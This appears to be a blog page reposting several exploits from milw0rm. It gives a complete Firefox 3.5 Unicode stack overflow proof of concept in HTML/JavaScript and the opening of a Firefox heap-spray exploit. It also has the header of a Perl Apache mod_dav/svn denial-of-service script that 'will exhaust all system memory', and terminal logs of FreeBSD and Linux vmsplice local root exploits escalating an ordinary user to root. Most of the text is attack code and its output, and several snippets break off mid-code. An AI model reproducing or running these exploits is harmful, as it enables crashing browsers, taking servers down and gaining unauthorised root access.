
Security

Firefox 3.5 unicode stack overflow

Firefox 3.5 Unicode stack overflow
http://www.yongbok.net/firefox3.5_unicode_stack_overflow.php

<html>
<head>
<script language="JavaScript" type="Text/Javascript">
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str, 21000000);
document.write(finalstr2);
document.write(finalstr);

// Repeat str num times: double the string until it is long enough, then trim to the exact length.
function mul8 (str, num) {
  var i = Math.ceil(Math.log(num) / Math.LN2),
      res = str;
  do {
    res += res;
  } while (0 < --i);
  return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

# milw0rm.com

FireFox 3.5 Exploit

A vulnerability has been found in Firefox 3.5 that can be attacked using the HTML source code below.
http://www.yongbok.net/firefox3.5_exploit.php

<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw </FONT>
</p>
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("…");
/* Heap Spray Code */
oneblock

Apache mod_dav / svn Remote Denial of Service Exploit

Apache mod_dav / svn Remote Denial of Service Exploit

### furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> \n";
    print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";
    exit;
}

if ($#ARGV < 1) { usage(); }

$hostname =

FreeBSD – 7.0~7.1 Local Kernel Root Exploit

An exploit on FreeBSD 7.0~7.1....

$ ls
root.c
$ gcc -o root root.c
$ ls
root    root.c
$ id
uid=1001(ruo91) gid=1001(ruo91) groups=1001(ruo91)
$ ./root
FreeBSD local kernel root exploit
by: christer/mu-b
http://www.bsdcitizen.org/ — BSDCITIZEN 2008!@$!
* allocated pointer page: 0x00000000 -> 0x08000000
* allocated itimer struct: 0x20000000 -> 0x200000DC
* filling pointer page… done
* found posix_clocks @
* it_page->it_clockid: 0x0CBFC70D
* ktimer_delete (0xD0000000)
* ktimer_delete: 0 1
$ id
uid=1001(ruo91) gid=1001(ruo91) euid=0(root) groups=1001(ruo91)

FreeBSD7.0~7.1 Local kernel root exploit
http://milw0rm.com/exploits/8261

Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit

This affects Linux 2.6.17 – 2.6.24.1, and as you can see below, you are logged in as root right away.

ruo91@YongBok:~$ uname -a
Linux YongBok.com 2.6.18 #1 SMP Fri Sep 22 13:02:54 KST 2006 i686 GNU/Linux
ruo91@Yongbok:~$ id
uid=1000(hehe) gid=100(users) groups=100(users)
ruo91@Yongbok:~$ ./root-exploite
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
mmap: 0x0 .. 0x1000
page: 0x0
page: 0x20
mmap: 0x4000 .. 0x5000
page: 0x4000
page: 0x4020
mmap: 0x1000 .. 0x2000
page: 0x1000
mmap: 0xb7dfd000 .. 0xb7e2f000
root
ruo91@Yongbok:~# id
uid=0(root) gid=0(root) groups=100(users)

Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit
http://www.milw0rm.com/exploits/5092